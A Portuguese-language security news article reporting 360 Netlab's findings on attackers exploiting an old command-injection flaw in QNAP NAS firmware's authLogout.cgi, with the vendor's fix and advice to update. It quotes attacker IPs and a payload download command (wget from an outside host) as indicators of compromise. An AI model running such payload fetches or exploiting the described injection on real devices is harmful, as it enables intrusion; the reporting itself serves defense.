Hackers têm como alvo os dispositivos QNAP NAS
Hackers estão varrendo a Internet em busca de dispositivos vulneráveis de armazenamento conectado à rede (NAS) executando várias versões de firmware QNAP vulneráveis a uma vulnerabilidade de execução remota de código (RCE) abordada pelo fornecedor há 3 anos.
De acordo com um relatório publicado por pesquisadores do Network Security Research Lab (360 Netlab) da Qihoo 360, os invasores estão explorando a vulnerabilidade de execução de comando remoto devido a um problema de injeção de comando que reside nos dispositivos NAS do firmware QNAP.
Os pesquisadores descobriram que o problema reside no programa CGI
/httpd/cgi-bin/authLogout.cgi
.
que é usado quando o usuário faz logout para selecionar a função de logout correspondente com base no nome do campo no Cookie.
“O problema é que QPS_SID, QMS_SID e QMMS_SID não filtram caracteres especiais e chama diretamente a função snprintf para unir a string de comando curl e chama a função do sistema para executar a string, tornando possível a injeção de comando.” lê o relatório publicado pela 360 Netlab.
Um invasor remoto não autenticado pode explorar a falha para obter autenticação usando o executável authLogout.cgi, porque ele não filtra caracteres especiais da entrada antes de chamar a função do sistema para executar a string de comando. Este comportamento possibilita a injeção de comandos e permite a execução remota de código.
Os pesquisadores do 360 Netlab relataram a falha ao QNAP PSIRT em 13 de maio e em 12 de agosto o fornecedor confirmou que o problema foi resolvido em uma atualização de segurança anterior, mas que ainda existem dispositivos QNAP NAS online que precisam ser atualizados.
A QNAP abordou a vulnerabilidade com o lançamento da versão do firmware 4.3.3 em 21 de julho de 2017. A correção proposta pelo fornecedor substitui a função usada para executar as sequências de comando.
“Esta versão substituiu a função do sistema por qnap_exec, e a função qnap_exec é definida no /usr/lib/libuLinux_Util.so.0”, continua 360 Netlab. “Usando o execv para executar o comando personalizado, a injeção de comando foi evitada.”
Os pesquisadores notaram que dois invasores IP, 219.85.109.140 e 103.209.253.252, estavam usando a mesma carga baixada com um arquivo wget http://165.227.39.105:8096/aaa após exploits bem-sucedidos.
360 Netlab apontou que os invasores não automatizaram totalmente o ataque usando um botnet, no momento seu verdadeiro propósito ainda é um mistério.
“Recomendamos que os usuários do QNAP NAS verifiquem e atualizem seus firmwares em tempo hábil e também verifiquem se há processos e conexões de rede anormais”, concluem os pesquisadores.
O relatório publicado pela 360 Netlab inclui indicadores de comprometimento (IoCs) junto com a lista de todas as versões de firmware QNAP afetadas .
No início de agosto, a empresa taiwanesa instou seus usuários a atualizar o aplicativo Malware Remover para evitar que dispositivos NAS sejam infectados pelo malware QSnatch .
A Agência de Segurança Cibernética e de Infraestrutura dos Estados Unidos (CISA) e o Centro Nacional de Segurança Cibernética (NCSC) do Reino Unido também publicaram um comunicado conjunto sobre uma campanha massiva em andamento espalhando o malware de roubo de dados QSnatch.
Fonte: https://securityaffairs.co/wordpress/107750/hacking/qnap-nas-attacks.html